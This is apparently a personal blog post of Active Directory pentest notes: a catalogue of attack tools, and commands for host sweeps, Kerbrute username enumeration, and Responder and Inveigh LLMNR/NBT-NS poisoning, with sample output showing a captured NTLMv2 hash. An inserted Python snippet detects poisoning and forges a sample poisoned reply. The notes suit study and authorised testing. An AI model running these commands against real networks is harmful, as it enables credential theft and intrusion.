AD notes

floofy-kitty

just a collection of AD notes, tips/tricks and one-liners as a reference for future me

this is, and will be, a continuous work in progress. the notes and potentially even the formatting will undergo changes, so check back from time to time :)


Active Directory //

 Active Directory (AD) is a distributed, hierarchical structure that allows for centralized management of a set of resources, including:

  • users
  • computers
  • groups
  • network devices/file shares
  • group policies
  • devices
  • trusts

AD is a system to provide authentication, accounting and authorization functions within a Windows (enterprise) environment.

AD (& Windows) tools //

impacket > collection of python network protocol tools
GetUserSPNs.py > part of impacket. tool to find Service Principal Names tied to users
psexec.py > part of impacket. semi-interactive psexec-like shell
wmiexec.py > part of impacket. command execution over WMI
mssqlclient.py > part of impacket. provides the ability to interact with MSSQL databases
rpcdump.py > part of impacket. RPC endpoint mapper
ntlmrelayx.py > part of impacket. SMB relay attacks
GetNPUsers.py > part of impacket. ASREPRoasting attack to list AS-REP hashes for users with 'Do not require Kerberos preauthentication' set
raiseChild.py > part of impacket. automated child to parent domain privilege escalation
Kerbrute > a Go tool that uses Kerberos pre-auth to enum AD accounts, password spray and brute-force
Inveigh.ps1 > similar to responder. powershell tool for performing various network spoofing & poisoning attacks
rpcinfo > utility used to query the status of an RPC program or enumerate the list of available RPC services on a host
enum4linux > tool to enumerate info from Windows and Samba systems
Rubeus > C# tool to interact with, and abuse, Kerberos
ldapsearch > interface to interact with the LDAP protocol
LAPSToolkit > powershell functions that leverage PowerView to attack AD environments that have Microsoft's Local Administrator Password Solution (LAPS) deployed
setspn.exe > adds, reads, modifies and deletes the SPN property for an AD service account
secretsdump.py > remotely dump SAM and LSA secrets from a host
noPac.py > exploit combo of CVE-2021-42278 & CVE-2021-42287 to impersonate DA from a standard domain user
PetitPotam.py > CVE-2021-36942 PoC to coerce Windows hosts to authenticate to other machines via MS-EFSRPC (EfsRpcOpenFileRaw) or other functions
getnthash.py > use an existing TGT to request the PAC for the current user using U2U
gpp-decrypt > extract usernames and passwords from Group Policy Preferences files
ticketer.py > creation and customization of TGT/TGS tickets. great for Golden Ticket creation, child to parent trust attacks, etc.
PingCastle > audit the security level of an AD environment based on a risk assessment and maturity framework using the CMMI program

ADRecon > extract various data from a target AD environment. can be output in MS Excel format
ldapdomaindump > dump domain info including users, groups, devices etc.
gMSAdumper > dump password blobs of service accounts (svc account must be in the same group)
smbmap > SMB share enumeration
responder > allows you to play MitM for Windows authentication, intercepting credentials to services (LLMNR, NBT-NS and MDNS poisoner)
DomainPasswordSpray > powershell tool to spray against users of a domain
PowerView/SharpView > powershell tool to fully enumerate a Windows domain
BloodHound > GUI visual map of AD relationships. gives clear and concise attack paths that may have otherwise gone unnoticed (a python version based on impacket is also available)
SharpHound > c# data collector to gather AD info that can later be ingested into BloodHound
CrackMapExec > enum, attack and post-exploit toolkit. CME attempts to live off the land and abuse built-in AD features and protocols like SMB, WMI, WinRM and MSSQL
C# Inveigh > c# version of Inveigh with a semi-interactive console
rpcclient > part of the Samba suite. can be used to perform a variety of AD enum tasks
enum4linux-ng > similar to the original, but a bit more versatile, e.g. the ability to export findings as YAML or JSON
Snaffler > find info in AD on computers with accessible file shares
windapsearch > python script to enumerate AD users, groups and computers using LDAP queries
smbserver.py > simple SMB server for interaction with Windows hosts
Mimikatz > many functions. notably, extracting passwords, pass-the-hash and Kerberos ticket extraction from memory on a host
evil-winrm > provides an interactive shell on a host over the WinRM protocol
CVE-2021-1675.py (cube0x0) > python PrintNightmare PoC
gettgtpkinit.py > manipulate certificates and TGTs
adidnsdump > enumerate and dump DNS records from a domain. similar to performing a DNS zone transfer
lookupsid.py > SID bruteforcing tool
Active Directory Explorer > AD viewer and editor. navigate an AD database, take a snapshot for offline analysis, view object properties & attributes, compare two snapshots to view changes
Group3r > audit and find security misconfigurations in AD Group Policy Objects (GPO)



Enumeration //


 AD users -> enumerate valid user accounts for potential password spraying
 AD joined computers -> key computers include Domain Controllers, file servers, SQL servers, web servers, Exchange mail servers, database servers, SharePoint servers, etc.
 Key services -> Kerberos, NetBIOS, LDAP, DNS, etc.
 Vulnerable hosts & services -> a quick win (e.g. SharePoint CVE, etc.)

Starting with passive identification of hosts in the network (while already in the network):
  - wireshark - GUI based packet monitoring
  - tcpdump - cli based packet monitoring
  - net-creds - a pcap / network credential sniffer
  - pktmon.exe - network monitoring default installed on win10

With TCPdump :
hack@sparrow$ sudo tcpdump -i eth0

note the protocols being used, and the hosts on the network

Responder in analysis mode :
hack@sparrow$ sudo responder -I eth0 -A

note any new hosts to add to our IP / DNS list

FPing (uses ICMP to sweep the network & interact with hosts. queries hosts in a cyclical manner as opposed to waiting for multiple requests to a single host to return):
hack@sparrow$ fping -asgq 10.10.10.0/23

validates active hosts for further reconnaissance

similar - but less stealthy - network sweep with a basic ping cmd:

hack@sparrow$ cat sweep.sh
#!/bin/bash
# usage: ./sweep.sh 192.168.1   (the first three octets of the /24 to sweep)
# one ping per host, run in parallel; print only the addresses that answered
for ip in $(seq 1 254); do
    ping -c 1 "$1.$ip" | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done
wait

hack@sparrow$ ./sweep.sh 192.168.1
192.168.1.2
192.168.1.1
192.168.1.4
192.168.1.7
192.168.1.3
192.168.1.9
192.168.1.8

either option would give us a more detailed list of active hosts to run nmap against. add the live hosts to a text file and feed it to nmap:
hack@sparrow$ sudo nmap -A -iL hosts

we can further enum AD usernames with Kerbrute. Kerberos pre-auth failures often won't trigger logs/alerts. We can point Kerbrute at the DC and feed it a wordlist of usernames.

We can note down any discovered usernames for a password spray attack when our attacks become more active.

hack@sparrow$ kerbrute userenum -d DOMAINCON.LOCAL --dc 10.10.10.5 jsmith.txt -o valid_ad_users


LLMNR and NBT-NS:

  • alternate methods of host identification for when DNS fails
       - i.e. when DNS resolution fails, the machine will typically ask other machines on the local network for the host via LLMNR
  • based on the DNS format; allows hosts on the same local link to perform name resolution for other hosts
  • uses port 5355 UDP natively
  • NBT-NS will be used if LLMNR fails
       - identifies systems on the local network by NetBIOS name - utilizes port 137 UDP


 Any host on the network can reply to LLMNR/NBT-NS name resolution requests. With network access we can use Responder to poison these requests by spoofing an authoritative name resolution source (i.e. a host that's supposed to belong in the network). Responder does this by responding to LLMNR and NBT-NS traffic as if it has an answer; it then captures the NetNTLM hash used to authenticate to us, which we can crack offline. This can also lead to SMB relay attacks.

Example scenario:

  1. Host attempts to connect to share at \\share02.example.local but accidentally types \\shar02.example.local
  2. The DNS server responds stating that the requested host is unknown
  3. The host broadcasts to the entire local network asking where \\shar02.example.local is
  4. Responder replies to the host that it is \\shar02.example.local
  5. The host believes it and sends an authentication request to Responder with a username and NTLMv2 hash
  6. We use the hash to crack the password offline or try an SMB relay attack
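A defensive counterpart to the scenario above, added here as an example and not code from these notes or from Responder: a canary-query detector that multicasts an LLMNR query for a hostname that cannot exist and flags any host that answers it, which is exactly what a poisoner does in step 4. The canary name and the 2-second timeout are my choices; the 224.0.0.252 multicast group and UDP port 5355 come from RFC 4795.

```python
# Canary-query detector for LLMNR poisoning (added example, not code from the notes).
import random, socket, struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # RFC 4795 multicast group / UDP port

def build_llmnr_query(name, txid):
    """LLMNR query in DNS wire format: 12-byte header plus one A/IN question."""
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)

def _skip_name(pkt, off):
    if (pkt[off] & 0xC0) == 0xC0:        # two-byte compression pointer
        return off + 2
    while pkt[off]:                      # length-prefixed labels, 0 terminates
        off += pkt[off] + 1
    return off + 1

def parse_llmnr_answers(pkt, txid):
    """Return the A-record IPs in a response to our txid; [] for anything else."""
    rid, flags, qd, an, _, _ = struct.unpack_from("!HHHHHH", pkt, 0)
    if rid != txid or qd != 1 or not flags & 0x8000:  # wrong id, or QR=0 (a query)
        return []
    off, ips = _skip_name(pkt, 12) + 4, []  # skip the echoed question (name, type, class)
    for _ in range(an):
        off = _skip_name(pkt, off)
        rtype, _, _, rdlen = struct.unpack_from("!HHIH", pkt, off)  # type, class, ttl, rdlen
        if rtype == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(pkt[off + 10:off + 14]))
        off += 10 + rdlen
    return ips

def forge_poisoned_response(query, ip):
    """Constructed sample of a poisoner's A answer to `query`, for offline testing only."""
    txid, qname, qtail = struct.unpack_from("!H", query, 0)[0], query[12:-4], query[-4:]
    return (struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0) + qname + qtail
            + qname + struct.pack("!HHIH", 1, 1, 30, 4) + socket.inet_aton(ip))

def probe(canary="canary-hostname-does-not-exist", timeout=2.0):
    """Multicast the canary query; return (answering_host, claimed_ip) pairs."""
    txid, hits = random.randrange(0x10000), []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_llmnr_query(canary, txid), (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:                  # collect every reply until the timeout
                data, (src, _) = s.recvfrom(1024)
                hits += [(src, ip) for ip in parse_llmnr_answers(data, txid)]
        except socket.timeout:
            return hits
```

Run probe() from a host on the segment being defended: a clean network returns an empty list, while a poisoner shows up as the answering host together with the address it wants victims to authenticate to.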

LLMNR / NBT-NS poisoning tools:

tools description
Responder > purpose built to poison LLMNR, NBT-NS and MDNS
Inveigh > cross-platform MitM for spoofing and poisoning attacks
Metasploit > several built-in scanners and spoofing modules made for poisoning

Responder and Inveigh can be used against the following protocols:

  • LLMNR
  • DNS
  • MDNS
  • NBNS
  • DHCP
  • ICMP
  • HTTP
  • HTTPS
  • SMB
  • LDAP
  • WebDAV
  • Proxy Auth

Responder also has support for:
  • MSSQL
  • DCE-RPC
  • FTP, POP3, IMAP, and SMTP auth

Some typical modes for Responder include:
  • -A which puts us into analyze mode to see NBT-NS/BROWSER/LLMNR requests
  • -w uses built-in WPAD proxy server, effective in capturing HTTP requests when user launches Internet Explorer w/ auto-detect settings enabled
  • -f attempt to fingerprint the remote host OS & version
  • -F & -P can be used to force NTLM or basic auth but may cause a login prompt


Responder will write hashes to screen and to /usr/share/responder/logs.

example command:

┌──(hack🐱sparrow)-[~]
└─$ sudo responder -I eth0 -w

                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

[*] [MDNS] Poisoned answer sent to 10.10.10.11 for name web03.local
[*] [LLMNR]  Poisoned answer sent to 10.10.10.11 for name web03
[SMB] NTLMv2 Client   : 10.10.10.11
[SMB] NTLMv2 Username : domain\admin
[SMB] NTLMv2 Hash     : admin::domain:ffee000aa

from here we can take the hash and slap it into john to crack it offline (using the netntlmv2 format)

Poisoning from Windows

We’ll be using Inveigh on a Windows host.

First we have to make sure we can execute powershell scripts:
PS C:\> Set-ExecutionPolicy -ExecutionPolicy RemoteSigned

With the PowerShell version we’d run it like so:
PS C:\> Import-Module .\Inveigh.ps1

We can view the list of Inveigh parameters on their wiki or by running this command:
PS C:\> (Get-Command Invoke-Inveigh).Parameters

Running Inveigh like Responder to poison LLMNR/NBNS (we need admin privs to run SMB listener):
PS C:\> Invoke-Inveigh -NBNS Y -NBNSTypes "20","00" -ConsoleOutput Y -SMB Y

Clear-Inveigh – clear the Inveigh hashtable
Get-Inveigh – get data from the Inveigh hashtable
   -NTLMV2 parameter to return all NTLMv2 hashes that were captured
Stop-Inveigh – stop all running Inveigh modules
Watch-Inveigh – enable real time console output


If we need to use the .exe version, we can find examples of usage from the repo

slow work in-progress. check back next week

This post is licensed under CC BY 4.0 by the author.
